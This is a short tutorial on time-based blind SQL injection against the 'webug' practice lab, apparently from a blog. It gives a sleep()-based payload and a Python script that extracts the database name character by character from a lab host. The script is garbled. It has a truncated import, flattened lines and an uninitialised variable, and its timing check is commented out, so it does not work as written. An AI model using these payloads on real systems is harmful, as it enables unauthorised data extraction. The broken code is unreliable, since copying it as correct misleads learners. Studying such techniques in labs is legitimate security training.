When testing the injection vulnerability, the page does not return the result, even if there is no error, you can consider the delay.
For example this statement?type=1 and if(length(database())=%d,sleep(5),1)
If this statement is executed correctly by the server, the server will return data 5 seconds slower than usual, and judge whether it is correct or incorrect by comparing the time.
This provides us with ideas for programming. If you want to guess a field, you can first guess its length, and guess each character in a
This time it's still an exercise on webug
mport requests import time payloads = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,' print( 'start get length...')
def long(): for l in range(1,21): startTime1=time.time() url1 = "http://192.168.148.129/pentest/test/time/?type=1 and if(length(database())=%d,sleep(5),1)"%(l) response1 = requests.get(url1) if time.time() - startTime1 > 5: length=l print ("the length is " + str(length)) break
return length def inject(): print( 'start database sql injection...') for d in range(1,length+1): for payload in payloads: startTime2=time.time() url2 = "http://192.168.148.129/pentest/test/time/?type=1 and if(substr(database(),'%d',1)='%s',sleep(5),1)"%(d,payload) response2 = requests.get(url2) # if time.time() - startTime2 > 5: database+=payload print(database) break
return database
if __name__ == '__main__':
length=long()
dabase=inject()
print("the database is " + database)
The idea is to guess the field length first, and compare it with each character in the payload to get the final result.